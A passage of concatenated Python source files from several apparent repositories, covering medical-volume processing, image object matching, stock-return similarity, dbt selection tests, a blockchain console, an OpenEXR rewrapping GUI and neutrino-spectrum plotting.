convert_volume = convert_volume + temp_target
out_volume = in_volume * 1
out_volume[mask_volume>0] = convert_volume[mask_volume>0]
return out_volume
def get_random_roi_sampling_center(input_shape, output_shape, sample_mode, bounding_box = None):
"""
get a random coordinate representing the center of a roi for sampling
inputs:
input_shape: the shape of sampled volume
output_shape: the desired roi shape
sample_mode: 'valid': the entire roi should be inside the input volume
'full': only the roi centre should be inside the input volume
bounding_box: the bounding box which the roi center should be limited to
outputs:
center: the output center coordinate of a roi
"""
center = []
for i in range(len(input_shape)):
if(sample_mode[i] == 'full'):
if(bounding_box):
x0 = bounding_box[i*2]; x1 = bounding_box[i*2 + 1]
else:
x0 = 0; x1 = input_shape[i]
else:
if(bounding_box):
x0 = bounding_box[i*2] + int(output_shape[i]/2)
x1 = bounding_box[i*2+1] - int(output_shape[i]/2)
else:
x0 = int(output_shape[i]/2)
x1 = input_shape[i] - x0
if(x1 <= x0):
centeri = int((x0 + x1)/2)
else:
centeri = random.randint(x0, x1)
center.append(centeri)
return center
def transpose_volumes(volumes, slice_direction):
"""
transpose a list of volumes
inputs:
volumes: a list of nd volumes
slice_direction: 'axial', 'sagittal', or 'coronal'
outputs:
tr_volumes: a list of transposed volumes
"""
if (slice_direction == 'axial'):
tr_volumes = volumes
elif(slice_direction == 'sagittal'):
tr_volumes = [np.transpose(x, (2, 0, 1)) for x in volumes]
elif(slice_direction == 'coronal'):
tr_volumes = [np.transpose(x, (1, 0, 2)) for x in volumes]
else:
print('undefined slice direction:', slice_direction)
tr_volumes = volumes
return tr_volumes
def resize_ND_volume_to_given_shape(volume, out_shape, order = 3):
"""
resize an nd volume to a given shape
inputs:
volume: the input nd volume, an nd array
out_shape: the desired output shape, a list
order: the order of interpolation
outputs:
out_volume: the reized nd volume with given shape
"""
shape0=volume.shape
assert(len(shape0) == len(out_shape))
scale = [(out_shape[i] + 0.0)/shape0[i] for i in range(len(shape0))]
out_volume = ndimage.interpolation.zoom(volume, scale, order = order)
return out_volume
def extract_roi_from_volume(volume, in_center, output_shape, fill = 'random'):
"""
extract a roi from a 3d volume
inputs:
volume: the input 3D volume
in_center: the center of the roi
output_shape: the size of the roi
fill: 'random' or 'zero', the mode to fill roi region where is outside of the input volume
outputs:
output: the roi volume
"""
input_shape = volume.shape
if(fill == 'random'):
output = np.random.normal(0, 1, size = output_shape)
else:
output = np.zeros(output_shape)
# print('the output_shape is ', output_shape)
r0max = [int(x/2) for x in output_shape]
# print('r0max: ', r0max)
r1max = [output_shape[i] - r0max[i] for i in range(len(r0max))]
# print('r1max: ', r1max)
r0 = [min(r0max[i], in_center[i]) for i in range(len(r0max))]
# print('r0: ', r0)
r1 = [min(r1max[i], input_shape[i] - in_center[i]) for i in range(len(r0max))]
# print('r1: ', r1)
out_center = r0max
output[np.ix_(range(out_center[0] - r0[0], out_center[0] + r1[0]),
range(out_center[1] - r0[1], out_center[1] + r1[1]),
range(out_center[2] - r0[2], out_center[2] + r1[2]))] = \
volume[np.ix_(range(in_center[0] - r0[0], in_center[0] + r1[0]),
range(in_center[1] - r0[1], in_center[1] + r1[1]),
range(in_center[2] - r0[2], in_center[2] + r1[2]))]
return output
def set_roi_to_volume(volume, center, sub_volume):
"""
set the content of an roi of a 3d/4d volume to a sub volume
inputs:
volume: the input 3D/4D volume
center: the center of the roi
sub_volume: the content of sub volume
outputs:
output_volume: the output 3D/4D volume
"""
volume_shape = volume.shape
patch_shape = sub_volume.shape
output_volume = volume
for i in range(len(center)):
if(center[i] >= volume_shape[i]):
return output_volume
r0max = [int(x/2) for x in patch_shape]
# print('r0max: ', r0max)
r1max = [patch_shape[i] - r0max[i] for i in range(len(r0max))]
# print('r1max: ', r1max)
r0 = [min(r0max[i], center[i]) for i in range(len(r0max))]
r1 = [min(r1max[i], volume_shape[i] - center[i]) for i in range(len(r0max))]
patch_center = r0max
if(len(center) == 3):
output_volume[np.ix_(range(center[0] - r0[0], center[0] + r1[0]),
range(center[1] - r0[1], center[1] + r1[1]),
range(center[2] - r0[2], center[2] + r1[2]))] = \
sub_volume[np.ix_(range(patch_center[0] - r0[0], patch_center[0] + r1[0]),
range(patch_center[1] - r0[1], patch_center[1] + r1[1]),
range(patch_center[2] - r0[2], patch_center[2] + r1[2]))]
elif(len(center) == 4):
output_volume[np.ix_(range(center[0] - r0[0], center[0] + r1[0]),
range(center[1] - r0[1], center[1] + r1[1]),
range(center[2] - r0[2], center[2] + r1[2]),
range(center[3] - r0[3], center[3] + r1[3]))] = \
sub_volume[np.ix_(range(patch_center[0] - r0[0], patch_center[0] + r1[0]),
range(patch_center[1] - r0[1], patch_center[1] + r1[1]),
range(patch_center[2] - r0[2], patch_center[2] + r1[2]),
range(patch_center[3] - r0[3], patch_center[3] + r1[3]))]
else:
raise ValueError("array dimension should be 3 or 4")
return output_volume
def get_largest_two_component(img, print_info = False, threshold = None):
"""
Get the largest two components of a binary volume
inputs:
img: the input 3D volume
threshold: a size threshold
outputs:
out_img: the output volume
"""
s = ndimage.generate_binary_structure(3,2) # iterate structure
labeled_array, numpatches = ndimage.label(img,s) # labeling
sizes = ndimage.sum(img,labeled_array,range(1,numpatches+1))
sizes_list = [sizes[i] for i in range(len(sizes))]
sizes_list.sort()
if(print_info):
print('component size', sizes_list)
if(len(sizes) == 1):
out_img = img
else:
if(threshold):
out_img = np.zeros_like(img)
for temp_size in sizes_list:
if(temp_size > threshold):
temp_lab = np.where(sizes == temp_size)[0] + 1
temp_cmp = labeled_array == temp_lab
out_img = (out_img + temp_cmp) > 0
return out_img
else:
max_size1 = sizes_list[-1]
max_size2 = sizes_list[-2]
max_label1 = np.where(sizes == max_size1)[0] + 1
max_label2 = np.where(sizes == max_size2)[0] + 1
component1 = labeled_array == max_label1
component2 = labeled_array == max_label2
if(max_size2*10 > max_size1):
component1 = (component1 + component2) > 0
out_img = component1
return out_img
def fill_holes(img):
"""
filling small holes of a binary volume with morphological operations
"""
neg = 1 - img
s = ndimage.generate_binary_structure(3,1) # iterate structure
labeled_array, numpatches = ndimage.label(neg,s) # labeling
sizes = ndimage.sum(neg,labeled_array,range(1,numpatches+1))
sizes_list = [sizes[i] for i in range(len(sizes))]
sizes_list.sort()
max_size = sizes_list[-1]
max_label = np.where(sizes == max_size)[0] + 1
component = labeled_array == max_label
return 1 - component
def remove_external_core(lab_main, lab_ext):
"""
remove the core region that is outside of whole tumor
"""
# for each component of lab_ext, compute the overlap with lab_main
s = ndimage.generate_binary_structure(3,2) # iterate structure
labeled_array, numpatches = ndimage.label(lab_ext,s) # labeling
sizes = ndimage.sum(lab_ext,labeled_array,range(1,numpatches+1))
sizes_list = [sizes[i] for i in range(len(sizes))]
new_lab_ext = np.zeros_like(lab_ext)
for i in range(len(sizes)):
sizei = sizes_list[i]
labeli = np.where(sizes == sizei)[0] + 1
componenti = labeled_array == labeli
overlap = componenti * lab_main
if((overlap.sum()+ 0.0)/sizei >= 0.5):
new_lab_ext = np.maximum(new_lab_ext, componenti)
return new_lab_ext
def binary_dice3d(s,g):
"""
dice score of 3d binary volumes
inputs:
s: segmentation volume
g: ground truth volume
outputs:
dice: the dice score
"""
assert(len(s.shape)==3)
[Ds, Hs, Ws] = s.shape
[Dg, Hg, Wg] = g.shape
assert(Ds==Dg and Hs==Hg and Ws==Wg)
prod = np.multiply(s, g)
s0 = prod.sum()
s1 = s.sum()
s2 = g.sum()
dice = (2.0*s0 + 1e-10)/(s1 + s2 + 1e-10)
return dice
|
<reponame>dfalveargOT/CropApp
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun May 5 15:45:11 2019
Copyright © 2019 DataRock S.A.S. All rights reserved.
@author: DavidFelipe
Second Module
Matching each object with the corresponding coordinates
"""
try:
import numpy as np
import cv2
import time
import progressbar
except:
print(" PLEASE REVIEW THE MODULES THAT NEEDS THE SOFTWARE - AN ERROR WAS OCCURRED")
print(" %% SECOND MODULE %%")
print(" -- Matching object module for images -- Check the current progress --")
class MatchCore:
"""
Procedure to find the objects and extract window information
of the current object in process
"""
def __init__(self, imageRGB, Rlayer1, Rlayer2, Rlayer3, Vmean, Vrange):
print(" ")
print("MatchCore process")
self.image = imageRGB
self.layer1 = Rlayer1
self.layer2 = Rlayer2
self.layer3 = Rlayer3
self.vector_mean = Vmean
self.vector_range = Vrange
def CoreFinding(self, layer):
shapeLayer = np.array(layer.shape)
val = shapeLayer.shape
print(" ")
print(" matchCore proceesing corefinding ")
if(val[0] == 3):
# print("RGB format found")
## Processing layer 1
widgets = [progressbar.Percentage(),
' ', progressbar.Bar(),
' ', progressbar.ETA(),
' ', progressbar.AdaptiveETA()]
bar = progressbar.ProgressBar(widgets=widgets, maxval=5)
bar.start()
Mlayer1, mask_layer1, vector_layer1, count_layer1, blob_layer1 = self.ObjectMatch(self.image, layer[:,:,0])
Mlayer2, mask_layer2, vector_layer2, count_layer2, blob_layer2 = self.ObjectMatch(self.image, layer[:,:,1])
Mlayer3, mask_layer3, vector_layer3, count_layer3, blob_layer3 = self.ObjectMatch(self.image, layer[:,:,2])
bar.update(1)
mask_layer = np.zeros_like(layer)
blob_layer = np.zeros_like(layer)
bar.update(2)
blob_layer[:,:,0] = blob_layer1
blob_layer[:,:,1] = blob_layer2
blob_layer[:,:,2] = blob_layer3
bar.update(3)
mask_layer[:,:,0] = mask_layer1
mask_layer[:,:,1] = mask_layer2
mask_layer[:,:,2] = mask_layer3
bar.update(4)
count_layer = np.array([count_layer1, count_layer2, count_layer3])
vector_layer = [vector_layer1, vector_layer2, vector_layer3]
bar.update(5)
return Mlayer1, Mlayer2, Mlayer3, mask_layer, vector_layer, blob_layer
elif(val[0] == 2):
# print("Fourier result processing")
match_layer, mask_layer, vector_layer, count_layer, blob_layer = self.ObjectMatch(self.image, layer)
return match_layer, mask_layer, vector_layer, blob_layer
else:
print(" PROBLEM WITH THE DATA, THE SIZE OF THE ENTRY IS NOT CORRECT, VERIFY THE LAST CONVERTIONS")
# cv2.CHAIN_APPROX_TC89_L1
def ObjectMatch(self, image, mask):
x, y, _ = image.shape
image_mark = np.copy(self.image)
object_mask = np.zeros([x,y])
contours,hierachy = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
counter = 0
vector_object = np.array([0,0,0,0])
for (i, contour) in enumerate(contours):
(x, y, w, h) = cv2.boundingRect(contour)
contour_valid = (w >= 7) and (
h >= 7) and (w <= 500) and (h <= 500)
if not contour_valid:
continue
counter += 1
## Definimos bounding box para el tracker
boundingBox = np.array([x,y,w,h])
## Definimos tipo de Tracker
# getting center of the bounding box
x1 = int(w / 2)
y1 = int(h / 2)
cx = x + x1
cy = y + y1
cv2.circle(image_mark, (cx, cy), 10, (255, 255, 255), 2)
cv2.circle(image_mark, (cx, cy), 4, (0, 0, 255), -1)
cv2.circle(object_mask, (cx, cy), 10, (255, 255, 255), 4)
## Vector of the current object
vector_object = np.vstack((vector_object, boundingBox))
###3 Detection using Blob
detector = cv2.SimpleBlobDetector_create()
keypoints = detector.detect(self.image)
image_blob = mask.copy()
# print(keypoints.type)
for kp in keypoints:
image_blob = cv2.drawMarker(image_blob, tuple(int(i) for i in kp.pt), color=(0,0,255))
return image_mark, object_mask, vector_object, counter, image_blob
|
<reponame>AccelexTechnology/Company2Vec
import pandas as pd
import pickle
revised_month_stock_df_dict = pickle.load(open("../dataset/revised_month_stock_df_dict.pkl","rb"))
use_ticker_list_sec = []
use_stock_price_list = []
sector_array = []
industry_array = []
use_text_data = []
stock_size = 58
use_ticker_list_limit = []
use_stock_price_list_limit = []
use_sec_code_list = []
for index, ticker in enumerate(use_ticker_list):
sec_code = int(str(ticker)[:4])
use_sec_code_list.append(sec_code)
if sec_code in sec_code2sector:
if len(revised_month_stock_df_dict[ticker]["return"][-stock_size:]) >= 12:
if (type(sec_code2sector[sec_code ]) == str) :
use_stock_price_list.append(list(revised_month_stock_df_dict[ticker]["return"])[-stock_size:])
sector_array.append(sec_code2sector[sec_code])
use_text_data.append(text_data[sec_code])
industry_array.append(sec_code2industry[sec_code])
use_ticker_list_sec.append(sec_code)
if len(revised_month_stock_df_dict[ticker]["return"]) == stock_size:
use_ticker_list_limit.append(sec_code)
use_stock_price_list_limit.append(list(revised_month_stock_df_dict[ticker]["return"]))
#else:
#print (sec_code)
stock_similarity_mat_limit = pd.read_csv("stock_data/common_length_mat.csv", index_col=0)
#use_ticker_list_limit_pair_cossim = sklearn.metrics.pairwise.cosine_similarity(np.array(use_stock_price_list_limit))
#stock_similarity_mat_limit = pd.DataFrame(dict(zip(use_ticker_list_limit, use_ticker_list_limit_pair_cossim)))
#stock_similarity_mat_limit.index = use_ticker_list_limit
#stock_similarity_mat_limit.to_csv("stock_data/common_length_mat.csv")
def calc_stockprice_cosine_similarity(code_1, code_2):
#moxnth_stock_info_df_1 = month_stock_info_df[month_stock_info_df["ticker"] == code_1]
#month_stock_info_df_2 = month_stock_info_df[month_stock_info_df["ticker"] == code_2]
month_stock_info_df_1 = revised_month_stock_df_dict[code_1]
month_stock_info_df_2 = revised_month_stock_df_dict[code_2]
common_months = (set(month_stock_info_df_1["month"]) & set(month_stock_info_df_2["month"]))
#print (len(common_months))
if len(common_months) < 12:
return 0
resurn_1 = month_stock_info_df_1[[(month in common_months) for month in month_stock_info_df_1["month"]]]["return"]
resurn_2 = month_stock_info_df_2[[(month in common_months) for month in month_stock_info_df_2["month"]]]["return"]
resurn_1_norm = np.array(resurn_1)/np.linalg.norm(resurn_1)
resurn_2_norm = np.array(resurn_2)/np.linalg.norm(resurn_2)
#return sklearn.metrics.pairwise.cosine_similarity(np.array([resurn_1_norm, resurn_2_norm]))
#return sklearn.metrics.pairwise.cosine_similarity(np.array([resurn_1, resurn_2]))
return resurn_1_norm.dot(resurn_2_norm)
remain_tick_list = np.sort(list(set(use_sec_code_list) - set(use_ticker_list_limit)))
additional_similarity_mat = []
for index_1, ticker_1 in enumerate(remain_tick_list):
df = pd.read_csv("stock_data/stock_similarity_mat/" + str(ticker_1) + ".csv", index_col=1)
df = df.T[1:].T
df.columns = [ ticker_1]
additional_similarity_mat.append(df)
additional_similarity_mat_df = pd.concat(additional_similarity_mat, axis = 1).T
additional_similarity_mat_df.columns = [int(str(val)[:4]) for val in additional_similarity_mat_df.columns]
common_similarity_mat_df = pd.read_csv("stock_data/common_length_mat.csv", index_col=0)
common_similarity_mat_df.columns = np.array(common_similarity_mat_df.columns).astype(int)
similarity_mat_df = pd.concat([
pd.concat([
pd.concat([common_similarity_mat_df[index], additional_similarity_mat_df[index]]).sort_index()
for index in common_similarity_mat_df.index], axis =1),
additional_similarity_mat_df.T], axis = 1).T.sort_index()
similarity_mat_df.to_csv("stock_data/all_similarity_mat.csv") |
import pytest
from dbt.tests.util import run_dbt
from tests.functional.graph_selection.fixtures import SelectionFixtures
def run_schema_and_assert(project, include, exclude, expected_tests):
# deps must run before seed
run_dbt(["deps"])
run_dbt(["seed"])
results = run_dbt(["run", "--exclude", "never_selected"])
assert len(results) == 10
test_args = ["test"]
if include:
test_args += ["--select", include]
if exclude:
test_args += ["--exclude", exclude]
test_results = run_dbt(test_args)
ran_tests = sorted([test.node.name for test in test_results])
expected_sorted = sorted(expected_tests)
assert ran_tests == expected_sorted
class TestSchemaTestGraphSelection(SelectionFixtures):
@pytest.fixture(scope="class")
def packages(self):
return {
"packages": [
{
"git": "https://github.com/dbt-labs/dbt-integration-project",
"revision": "dbt/1.0.0",
}
]
}
def test_schema_tests_no_specifiers(self, project):
run_schema_and_assert(
project,
None,
None,
[
"not_null_emails_email",
"unique_table_model_id",
"unique_users_id",
"unique_users_rollup_gender",
],
)
def test_schema_tests_specify_model(self, project):
run_schema_and_assert(project, "users", None, ["unique_users_id"])
def test_schema_tests_specify_tag(self, project):
run_schema_and_assert(
project, "tag:bi", None, ["unique_users_id", "unique_users_rollup_gender"]
)
def test_schema_tests_specify_model_and_children(self, project):
run_schema_and_assert(
project, "users+", None, ["unique_users_id", "unique_users_rollup_gender"]
)
def test_schema_tests_specify_tag_and_children(self, project):
run_schema_and_assert(
project,
"tag:base+",
None,
["not_null_emails_email", "unique_users_id", "unique_users_rollup_gender"],
)
def test_schema_tests_specify_model_and_parents(self, project):
run_schema_and_assert(
project,
"+users_rollup",
None,
["unique_users_id", "unique_users_rollup_gender"],
)
def test_schema_tests_specify_model_and_parents_with_exclude(self, project):
run_schema_and_assert(project, "+users_rollup", "users_rollup", ["unique_users_id"])
def test_schema_tests_specify_exclude_only(self, project):
run_schema_and_assert(
project,
None,
"users_rollup",
["not_null_emails_email", "unique_table_model_id", "unique_users_id"],
)
def test_schema_tests_specify_model_in_pkg(self, project):
run_schema_and_assert(
project,
"test.users_rollup",
None,
# TODO: change this. there's no way to select only direct ancestors
# atm.
["unique_users_rollup_gender"],
)
def test_schema_tests_with_glob(self, project):
run_schema_and_assert(
project,
"*",
"users",
[
"not_null_emails_email",
"unique_table_model_id",
"unique_users_rollup_gender",
],
)
def test_schema_tests_dep_package_only(self, project):
run_schema_and_assert(project, "dbt_integration_project", None, ["unique_table_model_id"])
def test_schema_tests_model_in_dep_pkg(self, project):
run_schema_and_assert(
project,
"dbt_integration_project.table_model",
None,
["unique_table_model_id"],
)
def test_schema_tests_exclude_pkg(self, project):
run_schema_and_assert(
project,
None,
"dbt_integration_project",
["not_null_emails_email", "unique_users_id", "unique_users_rollup_gender"],
)
|
<reponame>TranXuanHoang/Python
import json
from blockchain import Blockchain
from utility.verification import Verification
from wallet import Wallet
class NodeConsole:
""" Initialize starting point of the app and provide console and/or terminal based
commands for interacting with users.
Attributes:
wallet (:obj:`Wallet`): A wallet that has a pair of public and private keys.
The public key is used as a unique user ID of the sender of every transactions
made by this node user.
blockchain (:obj:`Blockchain`): An instance of the `Blockchain` class containing
all state of the blockchain and transactions as well as its processing logic methods.
"""
def __init__(self, port):
self.port = port
self.wallet = Wallet(port)
self.wallet.create_keys()
self.blockchain = Blockchain(self.wallet.public_key, port)
def get_transaction_value(self):
""" Return user input as a tuple. """
tx_recipient = input('Enter the recipient of the transaction: ')
tx_amount = float(input('Your transaction amount please: '))
return tx_recipient, tx_amount
def get_user_choice(self):
""" Return user choice as a string. """
return input('Your choice: ')
def print_blockchain_elements(self):
""" Print out all blocks in the blockchain. """
print('=' * 50)
for index, block in enumerate(self.blockchain.chain):
print(f'{index:>3}>>> {block}')
else:
print('_' * 50)
print(self.blockchain.chain)
print('_' * 50)
print('In JSON Format:')
jsonizeable_chain = [block.to_deep_dict()
for block in self.blockchain.chain]
print(json.dumps(jsonizeable_chain).encode('utf-8'))
print('=' * 50)
def listen_for_input(self):
while True:
print('Please choose an option')
print('1: Add a new transaction value')
print('2: Mine a new block')
print('3: Output the blockchain blocks')
print('4: Verify all transactions')
print('5: Create wallet')
print('6: Load wallet')
print('7: Save keys')
print('q: Quit')
user_choice = self.get_user_choice()
if user_choice == '1':
tx_data = self.get_transaction_value()
recipient, amount = tx_data
signature = self.wallet.sign_transaction(
self.wallet.public_key, recipient, amount)
if self.blockchain.add_transaction(self.wallet.public_key, recipient, signature, amount=amount):
print('Added transaction!')
else:
print('Transaction failed!')
print('_' * 50)
print('Current open transactions:')
print(self.blockchain.get_open_transactions())
print('_' * 50)
elif user_choice == '2':
if self.blockchain.mine_block() == None:
print('Mining failed. Got no wallet?')
elif user_choice == '3':
self.print_blockchain_elements()
elif user_choice == '4':
if Verification.verify_transactions(self.blockchain.get_open_transactions(), self.blockchain.get_balance):
print('All transactions are valid')
else:
print('There are invalid transactions')
elif user_choice == '5':
self.wallet.create_keys()
self.blockchain = Blockchain(self.wallet.public_key, self.port)
elif user_choice == '6':
self.wallet.load_keys()
self.blockchain = Blockchain(self.wallet.public_key, self.port)
elif user_choice == '7':
self.wallet.save_key()
elif user_choice == 'q':
break
else:
print('Invalid option!')
if not Verification.verify_chain(self.blockchain.chain):
self.print_blockchain_elements()
print('Invalid blockchain!')
break
print(
f'Balance of {self.wallet.public_key}: {self.blockchain.get_balance():6.2f}')
else:
print('User left!')
print('Done!')
if __name__ == '__main__':
from argparse import ArgumentParser
parser = ArgumentParser(
prog="Blockchain NodeConsole",
usage="python node.py [-p portNum | --port portNum]",
)
parser.add_argument('-p', '--port', type=int, default=5000)
args = parser.parse_args()
port = args.port
node = NodeConsole(port)
node.listen_for_input()
|
<filename>src/mainwindow.py
import os
import shutil
from PySide2 import QtCore, QtWidgets, QtUiTools
class DropWidget(QtWidgets.QWidget):
def __init__(self, *args, **kwargs):
super(DropWidget, self).__init__(*args, **kwargs)
self.setAcceptDrops(True)
def dragEnterEvent(self, e):
if e.mimeData().hasUrls():
e.acceptProposedAction()
else:
e.ignore()
def dropEvent(self, e):
for url in e.mimeData().urls():
path = url.toLocalFile()
line_edit = self.findChild(QtWidgets.QLineEdit)
line_edit.setText(path)
line_edit.editingFinished.emit()
class WrapperThread(QtCore.QThread):
progress = QtCore.Signal(float)
message = QtCore.Signal(str)
def __init__(self, parent):
super(WrapperThread, self).__init__(parent)
def set_properties(self, properties):
self.properties = properties
def cancel(self):
self.canceled = True
def run(self):
from wrapper import find_files, bu_dir, dst_path, rewrap
self.canceled = False
kwargs = self.properties
files = find_files(kwargs['input'], kwargs['framerange'])
if not kwargs.get('output'):
backup_dir, prev_backup = bu_dir(kwargs['input'])
i = 0
for image_file in files:
if self.canceled:
break
if not os.path.isfile(image_file):
self.message.emit('{path} not found'.format(path=image_file))
continue
if kwargs['output']:
src = image_file
dst = dst_path(image_file, kwargs['output'], kwargs['overwrite'])
if not dst:
continue
else:
src = os.path.join(backup_dir, os.path.basename(image_file))
dst = image_file
if os.path.isfile(src):
prev_backup = True
self.message.emit('Backup file from previous conversion in place. Process canceled.'.format(
filename=os.path.basename(src)))
return
self.message.emit(os.path.basename(dst))
if not kwargs['output']:
shutil.move(dst, src)
import traceback
try:
ok = rewrap(src, dst, **kwargs)
except Exception as e:
traceback.print_exc()
ok = False
if not ok and not kwargs.get('output'):
self.message.emit('Operation failed for {filename}, restoring backup file.'.format(
filename=os.path.basename(dst)))
shutil.move(src, dst)
elif kwargs.get('no_backup'):
os.remove(src)
i += 1
progress = i * 100.0 / len(files)
self.progress.emit(progress)
if kwargs.get('no_backup') and not prev_backup:
try:
os.removedirs(backup_dir)
except OSError:
pass
if self.canceled:
self.message.emit('Canceled')
else:
self.message.emit('Finished')
class Manager(QtCore.QObject):
def __init__(self, parent_widget=None, parent=None):
super(Manager, self).__init__(parent)
loader = QtUiTools.QUiLoader()
loader.registerCustomWidget(DropWidget)
file = QtCore.QFile("../ui/mainwindow.ui")
file.open(QtCore.QFile.ReadOnly)
self.window = loader.load(file, parent_widget)
file.close()
self.window.installEventFilter(self)
self.window.show()
self.setParent(self.window)
self.window.lineEdit_input1.editingFinished.connect(self.detect_sequence)
self.window.lineEdit_output.editingFinished.connect(self.detect_sequence)
self.window.pushButton_rewrap.clicked.connect(self.run)
self.window.pushButton_cancel.clicked.connect(self.cancel)
self.window.pushButton_browse_input1.clicked.connect(self.file_dialog)
self.window.pushButton_browse_output.clicked.connect(self.file_dialog)
self.window.setAcceptDrops(True)
self.thread = WrapperThread(self.window)
self.thread.message.connect(self.message)
self.thread.progress.connect(self.progress)
def cancel(self):
if self.thread.isRunning():
self.thread.cancel()
else:
self.window.close()
def progress(self, progress):
self.window.progressBar.setValue(progress)
def message(self, message):
self.window.plainTextEdit_log.appendPlainText(message)
def detect_sequence(self, line_edit=None):
from wrapper import find_sequence
if not line_edit:
line_edit = self.sender()
path = line_edit.text()
if path.split('.')[-1] in ['exr', 'EXR'] and not os.path.isdir(path):
path, first, last = find_sequence(path)
line_edit.setText(path)
if 'input' in line_edit.objectName():
self.window.pushButton_rewrap.setEnabled(bool(path))
if first and last:
self.window.findChild(QtWidgets.QSpinBox, 'spinBox_first').setValue(first)
self.window.findChild(QtWidgets.QSpinBox, 'spinBox_last').setValue(last)
else:
self.window.findChild(QtWidgets.QSpinBox, 'spinBox_first').setValue(0)
self.window.findChild(QtWidgets.QSpinBox, 'spinBox_last').setValue(0)
self.window.progressBar.setValue(0)
elif 'output' in line_edit.objectName():
self.window.checkBox_keep_backup.setEnabled(not bool(path))
self.window.checkBox_overwrite.setEnabled(bool(path))
else:
line_edit.clear()
self.window.plainTextEdit_log.appendPlainText('Input must be an OpenEXR file or sequence.')
def file_dialog(self):
line_edit = self.sender().parent().findChild(QtWidgets.QLineEdit)
file_name, _ = QtWidgets.QFileDialog.getOpenFileName(
self.window,
"Choose sequence ...",
os.path.dirname(line_edit.text()),
"OpenEXR Files (*.exr)",
)
if file_name:
line_edit.setText(file_name)
line_edit.editingFinished.emit()
def run(self):
self.window.plainTextEdit_log.clear()
self.window.pushButton_rewrap.setEnabled(False)
properties = {}
properties['input'] = self.window.lineEdit_input1.text()
properties['output'] = self.window.lineEdit_output.text()
properties['multipart'] = self.window.checkBox_multipart.isChecked()
properties['autocrop'] = self.window.checkBox_autocrop.isChecked()
properties['fix_channels'] = self.window.checkBox_fix_channels.isChecked()
properties['ex_manifest'] = self.window.checkBox_ex_manifest.isChecked()
properties['no_backup'] = not self.window.checkBox_keep_backup.isChecked()
properties['overwrite'] = self.window.checkBox_overwrite.isChecked()
properties['compression'] = self.window.comboBox_compression.currentText()
first = self.window.spinBox_first.value()
last = self.window.spinBox_last.value()
properties['framerange'] = '{}-{}'.format(first, last)
if properties['input'] == properties['output']:
properties.pop('output')
self.thread.set_properties(properties)
self.thread.start()
def main():
import sys
app = QtWidgets.QApplication(sys.argv)
test = Manager()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
<reponame>pershint/reacdb
from __future__ import print_function
import matplotlib.pyplot as plt
import seaborn as sns
sns.set(font_scale=2)
import numpy as np
import scipy as sp
import sys
def dNdEPlot_pts(energies,numSpec,bin_left,bin_right,sst12,m12,PID=None):
num_points = len(energies)
opacity = 0.9
fix, ax = plt.subplots()
plt.plot(energies,numSpec,'ro', alpha=opacity, color='b')
plt.hlines(numSpec,bin_left,bin_right, color = 'b')
plt.vlines(bin_left,numSpec, \
0.0000000001, color = 'b')
plt.vlines(bin_right,numSpec, \
0.0000000001, color = 'b')
ax.annotate(r'$\sin^{2}(\theta _{12})$ =' + str(sst12) + '\n' + \
r'$\Delta m^{2}_{21}$ = ' + str(m12), xy=(7,125),
xytext=(6.5,125))
plt.ylim(0,np.max(numSpec) + 1)
plt.ylabel(r'Events/ 200 keV')
if PID=='pos':
plt.xlabel('Prompt Energy (MeV)')
plt.title(r'Neutrino spectrum at given location in positron energy')
if PID=='nu':
plt.xlabel('Antineutrino Energy (MeV)')
plt.title(r'Neutrino spectrum at given location in antineutrino energy')
plt.show()
#Takes in a Histogram object as defined in /lib/histogram and plots it
def plot_EventHist(Histogram,sst12,m12):
num_points = len(Histogram.bin_centers)
opacity = 0.9
fix, ax = plt.subplots()
plt.plot(Histogram.bin_centers,Histogram.bin_values,'ro', \
alpha=opacity, color='b')
plt.hlines(Histogram.bin_values,Histogram.bin_lefts, \
Histogram.bin_rights, color = 'b')
plt.vlines(Histogram.bin_lefts,Histogram.bin_values, \
0.0000000001, color = 'b')
plt.vlines(Histogram.bin_rights,Histogram.bin_values, \
0.0000000001, color = 'b')
ax.annotate(r'$\sin^{2}(\theta _{12})$ =' + str(sst12) + '\n' + \
r'$\Delta m^{2}_{21}$ = ' + str(m12), xy=(7,200),
xytext=(6.5,200))
plt.xlabel('Energy (MeV)')
plt.ylabel(r'events/$10^{32}proton-years/MeV$')
plt.title(r'Neutrino spectrum in TNU at input location')
plt.show()
#Takes in a Histogram object as defined in /lib/histogram and plots it
def plot_TwoEventHist(Hist1,Hist2,sst12,m12):
num_points = len(Hist1.bin_centers)
opacity = 0.9
fix, ax = plt.subplots()
plt.plot(Hist1.bin_centers,Hist1.bin_values,'ro', \
alpha=opacity, color='r')
plt.hlines(Hist1.bin_values,Hist1.bin_lefts, \
Hist1.bin_rights, color = 'r')
plt.plot(Hist2.bin_centers,Hist2.bin_values,'bo', \
alpha=opacity, color='b')
plt.hlines(Hist2.bin_values,Hist2.bin_lefts, \
Hist2.bin_rights, color = 'b')
ax.annotate(r'$\sin^{2}(\theta _{12})$ =' + str(sst12) + '\n' + \
r'$\Delta m^{2}_{21}$ = ' + str(m12), xy=(7,200),
xytext=(6.5,200))
plt.xlabel('Energy (MeV)')
plt.ylabel(r'events/$10^{32}proton-years/MeV$')
plt.title(r'Comparison of two spectrum histograms')
plt.show()
def dNdEPlot_line(energies,numSpec,sst12,m12,PID=None):
num_points = len(energies)
opacity = 0.9
fig, ax = plt.subplots()
plt.plot(energies,numSpec, alpha=opacity, color='g')
plt.fill_between(energies, 1e-10, numSpec, facecolor ='g',alpha = 0.4)
ax.annotate(r'$\sin^{2}(\theta _{12})$ =' + str(sst12) + '\n' + \
r'$\Delta m^{2}_{21}$ = ' + str(m12), xy=(7,35),
xytext=(6.5,35))
# plt.xaxis.get_label().set_fontproperties(30)
if PID=='pos':
plt.xlabel('Prompt Energy (MeV)')
plt.ylabel(r'$dN/dE_{prompt}$ (MeV)')
plt.title(r'Event Spectrum as a function of prompt positron energy')
if PID=='nu':
plt.xlabel('Energy (MeV)')
plt.ylabel(r'$dN/dE_{\nu}$ (MeV)')
plt.title(r'Neutrino event spectrum')
else:
print("PID not recognized. Not making plot")
return
plt.show()
def dNdEPlot_line_TNU(energies,numSpec,sst12,m12,PID=None):
num_points = len(energies)
opacity = 0.9
fix, ax = plt.subplots()
ax.plot(energies,numSpec, alpha=opacity, color='g')
ax.fill_between(energies, 1e-10, numSpec, facecolor ='g',alpha = 0.4)
ax.annotate(r'$\sin^{2}(\theta _{12})$ =' + str(sst12) + '\n' + \
r'$\Delta m^{2}_{21}$ = ' + str(m12), xy=(7,50),
